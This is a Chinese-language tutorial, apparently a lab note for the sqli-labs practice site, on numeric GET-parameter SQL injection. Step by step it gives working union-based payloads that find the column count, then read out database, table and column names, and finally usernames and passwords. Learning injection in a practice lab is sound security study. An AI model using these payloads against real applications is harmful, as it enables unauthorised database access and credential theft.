目录

知识点：数字型get注入

 1、在url中输入?id=1 

 2、判断注入点

3、判断目前表的字段数

 4、判断回显位置

 5、爆库名

 6、爆表名

 7、爆字段名，以users表为例

​编辑8、爆值

---

知识点：数字型get注入

思路：

 1、在url中输入?id=1 

 2、判断注入点

输入?id=1'

 爆出数据库语句语法错误，说明这里存在数据库漏洞，后面加了注释符，还是爆出错误，说明不是单引号的错误，可以尝试一下是否为双引号

 单引号和双引号都会报错，那可能是数字型注入

 这里回显正常

 使用and 1=2，数据没有回显出来，说明这里存在数字型注入

3、判断目前表的字段数

?id=1 and 1=1 order by 3--+ ，没有报错

 ?id=1 and 1=1 order by 4--+   报错，说明当前表有3个字段

 4、判断回显位置

?id=1 and 1=2 union select 1,2,3 --+

 5、爆库名

?id=1 and 1=2 union select 1,2,database() --+

 6、爆表名

?id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

 7、爆字段名，以users表为例

?id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+

8、爆值

?id=1 and 1=2 union select 1,2,concat_ws(',',id,username,password) from security.users limit 0,1--+

 以此类推，就可以的得到这个数据库所有的值了

---

这篇文章就先写到这里了，欢迎批评指正